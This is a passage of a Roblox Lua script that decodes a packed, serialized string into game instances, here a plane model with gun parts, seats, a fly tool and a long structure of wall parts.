- return fields
- end
- RemoveAndSplit = function(t)
- return split(table_remove(t,1),comma)
- end
- t = split(str,";")
- props = RemoveAndSplit(t)
- classes = RemoveAndSplit(t)
- values = split(table_remove(t,1),'|')
- ICList = RemoveAndSplit(t)
- InstanceList = {}
- Model = inst"Model"
- CurPar = Model
- table_foreach(t,function(ct,c)
- if c=="n" or c=="p" then
- CurPar = c=="n" and LastIns or CurPar[parnt]
- else
- ct = split(c,"|")
- local class = classes[tonum(table_remove(ct,1))]
- if class=="UnionOperation" then
- LastIns = {UsePartColor="1"}
- else
- LastIns = inst(class)
- if LastIns:IsA"Script" then
- s(LastIns)
- elseif LastIns:IsA("ModuleScript") then
- ms(LastIns)
- end
- end
- local function SetProperty(LastIns,p,str,s)
- s = Types[typeof(LastIns[p])]
- if p=="CustomPhysicalProperties" then
- s = PhysicalProperties.new
- end
- if s then
- LastIns[p] = s(unpack(split(str,comma)))
- else
- LastIns[p] = str
- end
- end
- local UnionData
- table_foreach(ct,function(s,p,a,str)
- a = p:find":"
- p,str = props[tonum(p:sub(1,a-1))],values[tonum(p:sub(a+1))]
- if p=="UnionData" then
- UnionData = split(str," ")
- return
- end
- if class=="UnionOperation" then
- LastIns[p] = str
- return
- end
- SetProperty(LastIns,p,str)
- end)
- if UnionData then
- local LI_Data = LastIns
- LastIns = DecodeUnion(UnionData)
- table_foreach(LI_Data,function(p,str)
- SetProperty(LastIns,p,str)
- end)
- end
- table.insert(InstanceList,LastIns)
- LastIns[parnt] = CurPar
- end
- end)
- table_remove(ICList,1)
- table_foreach(ICList,function(a,b)
- b = split(b,">")
- InstanceList[tonum(b[1])][props[tonum(b[2])]] = InstanceList[tonum(b[3])]
- end)
- return Model:GetChildren()
- end
- local Objects = Decode('Name,Anchored,Position,Size,Color,Enabled,Heat,SecondaryColor,C0,C1,Part0,Part1,PrimaryPart,Transparency,Orientation,Velocity,BottomSurface,TopSurface,MaxForce,MaxTorque,LeftSurface,Scale,MeshId,MeshType,Value,RightSurface,BackSurface,Texture,Face,Reflectance,CanCollide,FrontSurface,Material,TextureId,MaxActivationDistance,Shape,Offset,StudsPerTileU,StudsPerTileV;Part,Model,Fire,Snap,BodyPosition,BodyGyro,Script,IntValue,Weld,Seat,SpecialMesh,CFrameValue,Decal,HopperBin,BlockMesh,CylinderMesh,ManualWeld,WedgePart,TrussPart,ClickDetector,Texture;Part|1|79.4396,12046.2851,-284.2603|64,0.4,64|1,0.6039,0|30|0|25|1,0,0|0,0.2,0,-1,-0,-0,0,0,1,0,1,0|-0.5,-6.4,-31.5,-1,0,0,0,0,1,0,1,0|-0.5,-6.4,-31.5,1,-0,-0,0,0,1,0,-1,-0|-18,-6.4,31.5,0,-1,-0,0,0,1,-1,0,0|79.9396,12052.8857,-252.7603|63,12.8,1|Plane|Parts|Engine|0.3882,0.3725,0.3843|77.4396,12046.6855,-284.2603|0,-90,0|-0.0338,-0.0076,0.0168|8,0.4,28|0|2|-1.5,3,-48|0,0,0|Count|-3,1.5999,-0.5,1,0,0,0,0,-1,0,1,0|-3,0.5999,11.4999,-1,0,0,0,0,-1,0,-1,0|-3,2,6.4999,-1,0,0,0,0,-1,0,-1,0|0.7686,0.1568,0.1098|82.4396,12047.8857,-284.2603|-0.034,-0.0069,0.0123|2,0.4,4|Gun2|0.9607,0.8039,0.1882|68.9396,12048.6855,-277.2603|-0.0304,0.0023,0.0181|2,0.4,3|1,1,0.6999|http://roblox.com/asset/?id=2251534|5|-0.5,0.5999,0,0,-1,0,0,0,-1,1,0,0|OriginCFrame|-103,10.8,-727,-1,0,-0,-0,1,-0,-0,0,-1|-102.9924,10.7712,-726.6936,-1,0.0004,0,0.0004,0.9999,-0.0007,-0.0001,-0.0007,-1|819.9973,10.8972,-814.9733,-1,0.0004,0,0.0004,0.9999,0,-0.0001,0,-1|222.9997,10.8018,-157.9743,-1,0,-0.0001,0,1,0,0,0,-1|-45.0007,11.6175,-151.9751,-1,0,-0.0001,0,1,0.0001,0,0.0001,-1|44,1,67,-1,0,-0,-0,1,-0,-0,0,-1|-164,1,88,-1,0,0,0,1,0,0,0,-1|-146,1,107,-1,0,0,0,1,0,0,0,-1|28,0.9897,44,-1,0,-0.0001,0,1,0,0,0,-1|Gun1|68.9396,12048.6855,-291.2603|-0.0378,-0.02,0.0181|39,0.6,25,-1,0,0,0,1,0,0,0,-1|39,3.4,25,-1,0,-0,-0,1,-0,-0,0,-1|39.001,3.3997,24.9911,-1,'
- ..'0.0001,0,0.0001,0.9999,-0.003,-0.0001,-0.003,-1|40,3.4,22,-1,0,-0,-0,1,-0,-0,0,-1|40.2761,3.402,22.0097,-0.9996,0,-0.0299,0.0001,0.9999,-0.0034,0.0298,-0.0034,-0.9996|40.2763,3.402,22.0097,-0.9996,0,-0.0299,0.0001,0.9999,-0.0034,0.0298,-0.0034,-0.9996|40.2762,3.4022,22.0096,-0.9996,0,-0.0299,0.0001,0.9999,-0.0035,0.0298,-0.0035,-0.9996|39.9999,0.5874,52.0001,-1,0,0,0,1,-0.0002,-0.0001,-0.0002,-1|40,1.4999,50,-1,0,0,0,1,0,0,0,-1|40.0166,0.5874,49.8706,-1,-0.0001,0.0005,-0.0001,1,-0.0002,-0.0006,-0.0002,-1|40.0166,0.5874,49.8704,-1,-0.0001,0.0005,-0.0001,1,-0.0002,-0.0006,-0.0002,-1|40,0.5876,48.9996,-1,-0.0001,0,-0.0001,1,-0.0002,-0.0001,-0.0002,-1|Gun3|66.9396,12048.6855,-295.2603|-0.0399,-0.0267,0.0192|Gun4|66.9396,12048.6855,-272.2603|-0.0278,0.01,0.0192|40.0015,0.5874,48.9997,-1,-0.0001,-0.0002,-0.0001,1,-0.0002,0.0001,-0.0002,-1|40.0018,0.5874,48.9996,-1,-0.0001,-0.0002,-0.0001,1,-0.0002,0.0001,-0.0002,-1|-8.0001,0.5878,50.0003,-1,-0.0001,0,-0.0001,1,-0.0002,-0.0001,-0.0002,-1|-61.0001,0.5874,44.9996,-1,-0.0001,0,-0.0001,1,-0.0002,-0.0001,-0.0002,-1|-61,0.5874,44.9999,-1,-0.0001,0,-0.0001,1,-0.0002,-0.0001,-0.0002,-1|-61,0.5874,44.9997,-1,-0.0001,0,-0.0001,1,-0.0002,-0.0001,-0.0002,-1|-61,0.5874,44.9994,-1,-0.0001,0,-0.0001,1,-0.0002,-0.0001,-0.0002,-1|Seat2|0.0666,0.0666,0.0666|82.4396,12047.4853,-284.2603|-0.0339,-0.0069,0.0129|2,0.4,8|0,-0.2001,0,-1,0,0,0,0,1,0,1,0|49,1.5,45,-1,0,-0,-0,1,-0,-0,0,-1|103,1.3999,24,-0,0,1,-0,1,0,-1,0,0|-1183,1,-644,1,0,0,0,1,0,0,0,1|4.9996,39.7889,35,-0.0001,0,0.9999,-0.0001,1,-0.0001,-1,-0.0001,-0.0001|-1.0004,39.7888,74.9999,0,0,0.9999,0,1,-0.0001,-1,0,0|-1.001,39.7872,39.9999,0,0.0001,0.9999,0,1,-0.0002,-1,0,0|-1.0031,39.7869,39.9999,0,0.0001,0.9999,0,1,-0.0002,-1,0,0|-26.0018,39.7882,81,0,-0.0001,-1,-0.0001,1,-0.0001,0.9999,0,0|-36.032,39.7717,82.9998,0.0001,-0.0015,0.9999,-0.0001,0.9999,0.0014,-1,-0.0001,0.'
- ..'0001|-10.0004,39.7889,24,0,0,0.9999,0,1,-0.0001,-1,0,0|-1.0004,39.7888,-35,0,0,0.9999,-0.0001,1,-0.0001,-1,-0.0001,0|-21.0008,0.587,67.0005,-0.0001,0.0001,0.9999,-0.0001,1,-0.0002,-1,-0.0001,-0.0001|-787.0003,6.2886,100,0,0,0.9999,-0.0001,1,-0.0001,-1,-0.0001,0|-788.0003,6.2886,63.9999,0,0,0.9999,0,1,-0.0001,-1,0,0|-788.0004,6.287,63.9999,0,0.0001,0.9999,-0.0001,1,-0.0002,-1,-0.0001,0|-788.0004,6.287,63.9999,0,0.0001,1,-0.0001,1,-0.0002,-1,-0.0001,0|-788.0004,6.2869,63.9999,0,0.0001,0.9999,-0.0001,1,-0.0002,-1,-0.0001,0|177,13.4,-59,-1,0,-0,-0,1,-0,-0,0,-1|-34.0001,0.5984,-16.9997,-1,0,0,0,1,-0.0001,-0.0001,-0.0001,-1|144.9999,17.7886,37,1,0,0,-0.0001,1,-0.0001,-0.0001,0,1|-25.0047,0.587,24.0208,1,0,0.0001,-0.0001,1,-0.0002,-0.0002,0.0001,1|PlaneCheck|Stunt|BodyParts|Jaw |56.9396,12054.0849,-279.7603|0,90,180|-0.0325,-0.0034,0.0158|1,6.4,1|0.5,1,1|0,0,0.5,1,0,0,0,1,0,0,0,1|0,0,1,1,0,0,0,-1,0,0,0,-1|61.9396,12054.0849,-279.7603|-0.0325,-0.0027,0.0132|1,6.4,5|0,0,2.5,1,0,0,0,1,0,0,0,1|0,0,-1,1,0,0,0,1,0,0,0,1|58.4396,12054.0849,-279.7603|-0.0325,-0.0032,0.015|1,6.4,2|6|http://www.roblox.com/asset/?id=11810928|0.1058,0.1647,0.2078|60.2397,12049.4853,-286.2603|90,-90,0|-0.0353,-0.0133,0.0214|4,4.4,4|57.9396,12050.5849,-276.2603|0,90,-90|-0.0302,0.0023,0.0209|1,6,1|0,0,0.5,1,-0,0,0,-1,0,0,-0,-1|0,3,0,-1,-0,-0,0,0,1,0,1,0|0.5,-3.5,0.5,0,0,-1,1,0,0,0,-1,0|-0.5,0.0999,-9,0,0,1,1,0,0,0,1,0|63.9396,12050.5849,-270.6603|-0.0272,0.0121,0.0177|1,6.8,1|56.9396,12054.0849,-288.7603|-0.0372,-0.0178,0.0158|58.9396,12050.5849,-276.2603|0,-90,-90|-0.0302,0.0025,0.0203|66.9396,12050.4853,-279.7603|0,90,0|-0.032,-0.002,0.0163|1,0.8,21|2,1,1|3|0.5,0,0,0,0,1,0,1,0,-1,-0,-0|1,-1.6,-4,0,0,-1,0,-1,0,-1,0,0|0,0.4,0,-1,-0,-0,0,0,1,0,1,0|0,-3.2,-8.5,1,0,0,0,0,1,0,-1,0|-0.5,0,0,-0,-0,-1,0,1,0,1,0,0|0.0999,-3,-5.5,0,-1,0,0,0,1,-1,0,0|0,-3.2,-5,1,0,0,0,0,1,0,-1,0|0,3.1999,10,1,0,0'
- ..',0,0,-1,0,1,0|61.4396,12050.5849,-276.2603|-0.0302,0.0028,0.019|1,6,4|0,0,2,1,0,0,0,1,0,0,0,1|0,0,-0.5,1,0,0,0,1,0,0,0,1|0,-3,0,1,0,0,-0,-0,-1,0,1,0|0.5,-3.5,0.5,0,0,-1,-1,0,0,0,1,0|65.4396,12050.5849,-273.2603|-0.0286,0.0082,0.0169|1,12,2|0,-6,0,1,0,0,-0,-0,-1,0,1,0|-0.5,0.0999,-1.5,0,0,1,-1,0,0,0,-1,0|0,0,1,1,0,0,0,1,0,0,0,1|0,2.6,0.5,1,0,0,0,-1,0,0,0,-1|70.4396,12050.5849,-273.2603|-0.0286,0.0089,0.0143|1,12,8|2.9999,-0.6,1,1,0,0,0,0,1,0,-1,0|1,-0.6,-4,1,0,0,0,0,1,0,-1,0|0,0,4,1,0,0,0,1,0,0,0,1|-0.5,0.0999,3.4999,0,0,1,-1,0,0,0,-1,0|0.1|57.8396,12049.4853,-286.2603|-0.0353,-0.0136,0.0227|4,0.4,4|1,9,1|0,-0.2001,0,1,0,0,-0,-0,-1,0,1,0|0,2.2,0,1,0,0,0,0,-1,0,1,0|62.9396,12049.4853,-282.2603|-0.0332,-0.0065,0.02|1,4,2|14,1.1,2.0999|-1,-2,-2.5001,-1,0,0,0,-1,0,0,0,1|-2,0.1999,-7.5,1,0,0,0,1,0,0,0,1|2,1.9999,7.4999,-1,0,0,0,1,0,0,0,-1|0,-2.2,0,1,0,0,0,0,1,0,-1,0|-1,0,-2.5,-1,0,0,0,-1,0,0,0,1|58.4396,12054.0849,-288.7603|-0.0372,-0.0175,0.015|http://www.roblox.com/asset/?id=12866384|69.4396,12049.4853,-277.2603|0,180,180|-0.0305,0.0024,0.0166|2,1.2,2|1,1,0.5|65.9396,12049.4853,-281.2603|-0.0326,-0.0045,0.0184|2,2.7999,5|4|0,1.3999,0,-1,-0,-0,0,0,1,0,1,0|0,-0.6,0,-1,0,0,0,0,1,0,1,0|1,0,0,0,0,1,0,1,0,-1,-0,-0|0.5,-1.0001,-1,0,0,-1,0,-1,0,-1,0,0|60.2397,12049.4853,-282.2603|-0.0332,-0.0069,0.0214|2,0,0,0,0,1,0,1,0,-1,-0,-0|0.5,-1.0001,-6.7,0,0,-1,1,0,0,0,-1,0|0,2.2,0,-1,-0,-0,0,0,1,0,1,0|0,-0.2001,0,-1,0,0,-0,0,1,-0,1,0|57.8396,12049.4853,-282.2603|-0.0332,-0.0072,0.0227|0.5,-1.0001,-9.1,0,0,-1,1,0,0,0,-1,0|67.4396,12049.4853,-272.2603|-0.0279,0.0101,0.0176|62.9396,12049.4853,-286.2603|-0.0353,-0.0129,0.02|70.9396,12048.8857,-281.2603|-0.0325,-0.0038,0.0167|2,4,5|61.9396,12054.0849,-288.7603|-0.0372,-0.017,0.0132|0,-3.2001,0,1,0,0,-0,-0,-1,0,1,0|0,0.3999,5,1,0,0,0,0,-1,0,1,0|3.4999,-3,-0.5001,0,1,0,0,0,1,1,0,0|0,0,-1.0001,1,0,0,0,1,0,0,0,1|57.9396,12050.5'
- ..'849,-292.2603|0,90,90|-0.0386,-0.0232,0.0209|-0.5,-3.5,0.5,0,0,1,-1,0,0,0,-1,0|65.9396,12047.4853,-281.2603|-0.0323,-0.0045,0.0216|2,1.2,5|0,1.4,-2.5,1,0,0,0,1,0,0,0,1|58.9396,12050.5849,-292.2603|-0.0386,-0.0231,0.0203|0,0,2,-1,0,0,0,1,0,0,0,-1|0,0,-0.5,-1,-0,-0,0,1,0,-0,-0,-1|0,0,0.5,1,0,0,0,-1,0,0,0,-1|65.9396,12047.4853,-287.2603|-0.0355,-0.0141,0.0216|0,0.6,0,-1,-0,-0,0,0,1,0,1,0|-3,0.1999,11.4999,-1,0,0,0,0,-1,0,-1,0|0,-0.6001,0,1,0,0,-0,-0,-1,0,1,0|0,1.3999,0,1,0,0,0,0,-1,0,1,0|0,0,-2.5,-1,-0,-0,0,1,0,-0,-0,-1|0.5,-2,-1,0,0,-1,0,-1,0,-1,0,0|70.9396,12047.4853,-284.2603|-0.0339,-0.0086,0.019|4,0.4,15|0,0,-7.5,-1,-0,-0,0,1,0,-0,-0,-1|0,0,4,-1,0,0,0,1,0,0,0,-1|0,-1.6001,0,1,0,0,0,0,1,0,-1,0|0,0,7.5,1,0,0,0,1,0,0,0,1|0.4999,-2,2,0,0,-1,0,1,0,1,0,0|-2,0,0,-0,-0,-1,0,1,0,1,0,0|-1,1,5.9999,0,0,1,0,-1,0,1,0,0|70.9396,12049.2851,-284.2603|-0.0342,-0.0086,0.0161|4,3.2,15|0.4999,-0.2,2,0,0,-1,0,1,0,1,0,0|-1,-0.8001,5.9999,0,0,1,0,-1,0,1,0,0|65.9396,12049.4853,-287.2603|-0.0358,-0.0141,0.0184|0.5,0,-1,0,0,-1,0,-1,0,-1,0,0|61.4396,12050.5849,-292.2603|0,-90,90|-0.0386,-0.0227,0.019|66.9396,12050.4853,-288.7603|-0.0367,-0.0163,0.0163|-0.1,-6,3.4999,0,1,0,0,0,1,1,0,0|0.0999,-6,1.5,0,-1,0,0,0,1,-1,0,0|-0.1,-3,-5.5,0,1,0,0,0,1,1,0,0|-0.1,3,9,0,1,0,0,0,-1,-1,0,0|-1,-1.6,-4,0,0,1,0,-1,0,1,0,0|-2,-9.1,-1.0001,0,0,1,-1,0,0,0,-1,0|-2,-6.7,-1.0001,0,0,1,-1,0,0,0,-1,0|-1,-0.0001,9.9999,0,0,1,0,1,0,-1,0,0|-1,-1.0001,1,0,0,1,0,-1,0,1,0,0|0,-3.2,-8.5,-1,0,0,0,0,1,0,1,0|0,3.1999,10,-1,0,0,0,0,-1,0,-1,0|76.9396,12048.4853,-281.2603|0,-90,180|-0.0325,-0.0029,0.0142|2,3.2,7|-5.5001,-0.8,-0.5,1,0,0,0,1,0,0,0,1|5.5,-2,-0.5,-1,0,0,0,-1,0,0,0,1|2,1,-6,0,0,-1,0,-1,0,-1,0,0|0,-1.6001,0,1,0,0,-0,-0,-1,0,1,0|0,-0.4001,0,-1,0,0,0,0,1,0,1,0|-2,-0.8001,5.9999,0,0,1,0,-1,0,1,0,0|0,0,3.5,1,0,0,0,1,0,0,0,1|0,0.4,2.4999,-1,0,0,0,1,0,0,0,-1|0,1.6,0,-1,-0,-0,0,0,1,0,1,0|3,0.1999,0.5,1,0,0,'
- ..'0,0,-1,0,1,0|76.9396,12050.4853,-281.2603|-0.0328,-0.0029,0.011|2,0.8,7|0,-1.6,2.4999,1,0,0,0,-1,0,0,0,-1|0.5,0,9.9999,0,0,-1,0,1,0,1,0,0|70.9396,12048.8857,-287.2603|-0.0357,-0.0134,0.0167|0,-0.4001,3.4999,-1,0,0,0,1,0,0,0,-1|0,2,0,-1,-0,-0,0,0,1,0,1,0|-3,0.1999,6.4999,-1,0,0,0,0,-1,-0,-1,0|0,-1.6,3.4999,1,0,0,0,-1,0,0,0,-1|69.4396,12049.4853,-291.2603|-0.0379,-0.02,0.0166|0,0.1999,-0.5,0,-1,0,0,0,-1,1,0,0|78.9396,12049.6855,-284.2603|0,180,0|-0.0342,-0.0074,0.0112|20,1,2|65.4396,12050.5849,-295.2603|-0.0401,-0.0269,0.0169|63.9396,12050.5849,-297.8603|-0.0415,-0.0313,0.0177|0,2.6,-1.0001,-1,0,0,0,-1,0,0,0,1|82.4396,12050.4853,-282.7603|-0.0336,-0.0045,0.0081|8,1.6,1|0,-0.8,-1,1,0,0,0,1,0,0,0,1|-3.5,0.7999,-1,1,0,0,0,1,0,0,0,1|76.9396,12050.4853,-287.2603|-0.0359,-0.0125,0.011|0,-0.4001,0,1,0,0,-0,-0,-1,0,1,0|0,-1.6,0,-1,0,0,0,0,1,0,1,0|82.4396,12047.6855,-282.7603|-0.0332,-0.0045,0.0126|8,0.8,1|-4,0,0,-0,-0,-1,0,1,0,1,0,0|1.5,0.2,-7.5001,-1,0,0,0,-1,0,0,0,1|82.4396,12048.8857,-282.7603|-0.0333,-0.0045,0.0107|1,1.6,8|0,-0.8001,0,1,0,0,-0,-0,-1,0,1,0|0,-0.4001,0,0,-1,0,0,-0,1,-1,-0,0|1,-0.4001,-5.5001,0,0,-1,0,-1,0,-1,0,0|0,0.8,0,-1,-0,-0,0,0,1,0,1,0|0,-0.8,0,0,1,0,0,0,1,1,0,0|67.4396,12049.4853,-295.2603|-0.04,-0.0266,0.0176|76.9396,12048.4853,-287.2603|-0.0356,-0.0125,0.0142|70.4396,12050.5849,-295.2603|-0.0401,-0.0262,0.0143|1,-0.6,4,-1,0,0,0,0,1,0,1,0|2.9999,-0.6,0,-1,0,0,0,0,1,0,1,0|0,0,0.9999,-1,0,0,0,1,0,0,0,-1|82.4396,12050.4853,-285.7603|-0.0351,-0.0093,0.0081|-1,-2,-5.5001,0,0,1,0,-1,0,1,0,0|0,-0.8,1,-1,0,0,0,1,0,0,0,-1|-3.5,0.7999,1,-1,0,0,0,1,0,0,0,-1|82.4396,12047.6855,-285.7603|0,0,180|-0.0347,-0.0093,0.0126|4,0,0,0,0,1,0,1,0,-1,-0,-0|-1.5,0.2,-7.5001,-1,0,0,0,-1,0,0,0,1|0,-0.8001,0,0,1,0,0,0,1,1,0,0|-1,0.7999,-5.5001,0,0,1,0,1,0,-1,0,-0|82.4396,12048.8857,-285.7603|-0.0349,-0.0093,0.0107|-1,-0.4001,-5.5001,0,0,1,0,-1,0,1,0,0|0,-0.8,0,0'
- ..',-1,0,0,0,1,-1,0,0|0.4313,0.6,0.7921|0.6999|82.4396,12051.2851,-284.2603|-0.0345,-0.0069,0.0068|2,0.8,2|4,3.7999,1.2|85.9396,12049.4853,-284.2603|-0.0342,-0.0064,0.0079|3,3.6,2|5,1,2|3.5,-1.0001,0.5,-1,0,0,0,1,0,0,0,-1|0,0,-1,-1,-0,-0,0,1,0,-0,-0,-1|-3.5,-1.0001,0.5,-1,0,0,0,1,0,0,0,-1|79.4396,12059.4853,-284.2603|-0.5,6.3999,-31.5,1,0,0,0,0,-1,0,1,0|0.3|75.9868,12049.499,-296.7498|0.0099,89.97,0|3,6,1|-0.0001,-0.6001,-1.5,-1,0,0,-0.0001,-0.0001,1,0,0.9999,-0.0001|76.988,12049.499,-298.7492|0,179.97,0.0099|1.9998,-0.6001,-0.5,-0.0001,0.9999,-0.0001,0,0,1,0.9999,0,-0.0001|PUT THE WEAPON IN THIS BRICK|0.949,0.9529,0.9529|74.9865,12049.2041,-296.7485|-0.01,-0.03,-0.01|1,1.2,5|Plane Tool V3|PlaneFlyer|FlyScript|Reload|PUT THIS IN THE WEAPON|78.9868,12049.498,-296.7481|5,6,1|-0.0001,-0.6001,1.5,-1,0,0,-0.0001,-0.0001,1,0,0.9999,-0.0001|76.9855,12049.499,-294.7492|-2.0002,-0.6002,-0.5001,-0.0001,0.9999,-0.0001,0,0,1,0.9999,0,-0.0001|77.4872,12053.0986,-296.7491|5,1.2,4|READ ME FOR INSTRUCTIONS|Frame|46.9396,12052.0878,-277.2602|1,10,2|0,0,1|1,1,1|47.9396,12052.8857,-302.2603|26,12.8,1|0,6.4,0,-1,-0,-0,0,0,1,0,1,0|-31.5,-0.2,-18,0,1,0,0,0,1,1,0,0|46.9398,12052.0888,-295.2602|42.9398,12052.0888,-295.2602|44.9398,12052.0888,-295.2602|37.4396,12057.5917,-295.2602|40.9438,12052.0878,-295.2602|0,180,0.0399|37.4396,12058.5908,-286.2602|20,1,22|1,0.647,0|38.9398,12052.0888,-295.2602|37.4396,12052.0878,-275.7602|0,180,-180|20,12,1|38.9396,12052.0878,-277.2602|40.9435,12052.0878,-277.2602|0,180,0.05|29.9396,12052.0878,-277.2602|35.9396,12052.0878,-277.2602|31.9396,12052.0878,-277.2602|37.4396,12057.5908,-277.2602|Anti-Lag|29.9398,12052.0878,-295.2602|44.9396,12052.0878,-277.2602|42.9396,12052.0878,-277.2602|37.4399,12046.5898,-286.2602|20,1,20|37.4396,12052.0888,-296.7602|0,-180,-180|33.9398,12052.0878,-295.2602|31.9398,12052.0878,-295.2602|0.5019,0.7333,0.8588|0.5'
- ..'|37.4398,12052.0888,-295.7602|35.9398,12052.0878,-295.2602|37.4396,12052.0878,-276.7602|33.9396,12052.0878,-277.2602|47.9396,12052.8857,-265.7603|27,12.8,1|0,-6.4001,0,1,0,0,-0,-0,-1,0,1,0|-31.5,0.1999,18.5,0,1,0,0,0,-1,-1,0,0|-31.5,-0.2,18.5,0,1,0,0,0,1,1,0,0|27.9398,12052.0878,-295.2602|27.9396,12052.0878,-277.2602|17.4396,12052.0878,-275.7602|17.4396,12052.0878,-276.7602|17.4396,12057.5898,-277.2602|24.9396,12052.0878,-277.2602|15.9396,12052.0878,-277.2602|26.9396,12052.0878,-277.2602|17.4399,12046.5898,-286.2602|26.9398,12052.0878,-295.2602|20.9438,12052.0878,-295.2602|24.9398,12052.0878,-295.2602|17.4396,12058.5898,-286.2602|17.4396,12052.0878,-296.7602|17.4398,12052.0878,-295.7602|17.4396,12057.5908,-295.2602|22.9398,12052.0878,-295.2602|15.9398,12052.0878,-295.2602|18.9398,12052.0878,-295.2602|20.9435,12052.0869,-277.2602|22.9396,12052.0878,-277.2602|18.9396,12052.0878,-277.2602|13.9396,12052.0878,-277.2602|13.9398,12052.0878,-295.2602|9.9396,12052.0878,-277.2602|9.9398,12052.0878,-295.2602|11.9396,12052.0878,-277.2602|11.9398,12052.0878,-295.2602|0.9435,12052.0869,-277.2602|0.9438,12052.0869,-295.2602|2.9398,12052.0878,-295.2602|4.9397,12052.0878,-295.2602|2.9396,12052.0869,-277.2602|7.9397,12052.0878,-295.2602|4.9396,12052.0869,-277.2602|6.9396,12052.0869,-277.2602|7.9396,12052.0878,-277.2602|6.9397,12052.0878,-295.2602|-4.0603,12052.0869,-295.2602|-2.5604,12052.0878,-296.7602|-1.0602,12052.0869,-295.2602|-2.5604,12057.5908,-295.2602|-2.5604,12052.0869,-275.7602|-4.0604,12052.0869,-277.2602|-6.0602,12052.0869,-295.2602|-2.5604,12052.0869,-276.7602|-6.0604,12052.0869,-277.2602|-2.5601,12046.5888,-286.2602|-2.5602,12052.0869,-295.7602|-1.0604,12052.0869,-277.2602|-2.5604,12057.5898,-277.2602|-2.5604,12058.5898,-286.2602|-10.0604,12052.0869,-277.2602|-8.0602,12052.0869,-295.2602|-10.0602,12052.0869,-295.2602|-8.0604,12052.0869,-277.2602|-12.06'
- ..'02,12052.0869,-295.2602|-12.0604,12052.0869,-277.2602|-22.5601,12052.0859,-295.7602|-17.0602,12052.0859,-277.2602|-17.0601,12052.0859,-295.2602|-19.0602,12052.0859,-277.2602|-19.0601,12052.0859,-295.2602|-22.5601,12046.5869,-286.2602|-22.5605,12057.5908,-277.2602|-22.5601,12052.0859,-275.7602|0,0,-180|-21.0602,12052.0859,-277.2602|-21.0601,12052.0859,-295.2602|-13.0602,12052.0869,-277.2602|-15.0602,12052.0869,-277.2602|-15.0601,12052.0859,-295.2602|-13.0601,12052.0859,-295.2602|-22.5601,12052.0859,-296.7602|-22.5604,12057.5888,-295.2602|-22.5602,12052.0859,-276.7602|-22.5604,12058.5888,-286.2602|-24.0601,12052.0859,-295.2602|-24.0602,12052.0859,-277.2602|-28.0601,12052.0849,-295.2602|-30.0601,12052.0849,-295.2602|-26.0643,12052.0859,-277.2602|0,0,0.05|-28.0602,12052.0859,-277.2602|-30.0602,12052.0859,-277.2602|-26.0641,12052.0849,-295.2602|-32.0602,12052.0859,-277.2602|-32.0601,12052.0849,-295.2602|-34.06,12052.5849,-295.7602|3,11,3|-34.0602,12052.5859,-276.7602|-34.5602,12052.0849,-261.7562|0,90,0.05|-34.5602,12052.0859,-266.7602|-34.5602,12052.0859,-263.7602|-33.0602,12052.0859,-265.2604|0,90,-180|-34.5602,12052.0859,-299.7602|-34.5604,12057.5908,-265.2602|-34.0602,12052.0859,-265.2602|-34.5602,12052.0859,-270.7602|-34.5602,12052.0859,-301.7602|-34.5602,12052.0859,-268.7602|-34.5602,12052.0859,-297.7602|-34.5602,12052.0859,-274.7602|-34.5602,12052.0859,-272.7602|-34.5603,12052.0859,-259.7602|-52.5602,12052.0849,-301.7604|-52.5602,12052.0849,-299.7604|-53.0602,12052.5849,-295.7602|-53.5601,12046.5859,-286.2602|42,1,20|-43.5604,12058.5888,-296.2603|42,1,22|-52.5602,12052.0849,-297.7604|-52.5602,12052.0849,-268.7604|-54.0602,12052.0849,-265.2604|-52.5602,12052.0849,-263.7604|-52.5602,12052.0849,-266.7604|-53.0603,12052.0849,-265.2604|-52.5602,12052.0849,-270.7604|-53.0602,12052.5849,-276.7602|-52.5602,12052.0849,-272.7604|-43.5605,12058.5888,-265.260'
- ..'2|-52.5602,12052.0849,-274.7604|-34.5602,12052.0869,-250.7602|-34.5604,12057.5888,-245.2602|-43.5605,12058.5888,-245.2603|-34.5602,12052.0869,-254.7602|-52.5602,12052.0859,-250.7604|-34.5602,12052.0869,-252.7602|-34.5602,12052.0869,-246.7602|-52.5602,12052.0859,-248.7604|-52.5602,12052.0859,-252.7604|-52.5602,12052.0859,-246.7604|-52.5603,12052.0849,-259.7604|-43.5601,12046.5859,-265.7602|21,1,20|-52.5602,12052.0839,-261.7565|-52.5603,12052.0849,-257.7604|-34.5603,12052.0859,-257.7602|-52.5603,12052.0849,-255.7604|-34.5603,12052.0859,-255.7602|-52.5602,12052.0859,-254.7604|-34.5602,12052.0869,-248.7602|-52.5602,12052.0849,-237.7604|-34.5602,12052.0869,-237.7602|-33.0603,12052.0869,-245.2604|-34.5602,12052.0859,-241.7563|-43.5601,12046.5878,-245.2602|-53.0603,12052.0859,-245.2604|-52.5602,12052.0859,-239.7604|-52.5602,12052.0849,-241.7564|-52.5602,12052.0859,-243.7604|-34.5602,12052.0869,-239.7602|-34.5602,12052.0869,-243.7602|-34.0602,12052.0869,-245.2602|-34.5603,12052.0869,-230.7602|-52.5603,12052.0859,-230.7604|-34.5602,12052.0869,-232.7602|-52.5602,12052.0859,-232.7604|-34.5602,12052.0869,-235.7602|-52.5602,12052.0849,-235.7604|-34.5602,12052.0869,-234.7602|-52.5602,12052.0859,-234.7604|-43.5605,12058.5888,-225.2602|-34.5603,12052.0869,-228.7602|-34.5605,12057.5888,-225.2602|-52.5603,12052.0859,-228.7604|-34.5603,12052.0869,-226.7602|-52.5603,12052.0859,-226.7604|-34.0603,12052.0869,-225.2602|-33.0603,12052.0869,-225.2604|-34.5603,12052.0869,-219.7602|-43.5601,12046.5878,-225.2602|-34.5603,12052.0869,-215.7602|-34.5603,12052.0869,-223.7602|-34.5603,12052.0859,-221.7563|-34.5603,12052.0869,-208.7602|-43.5605,12058.5888,-205.2602|-34.5603,12052.0869,-214.7602|-34.5603,12052.0869,-217.7602|-34.5605,12057.5888,-205.2602|-52.5603,12052.0859,-212.7604|-52.5603,12052.0859,-210.7604|-52.5603,12052.0859,-206.7604|-52.5603,12052.0859,-214.7604|-52.5603,12'
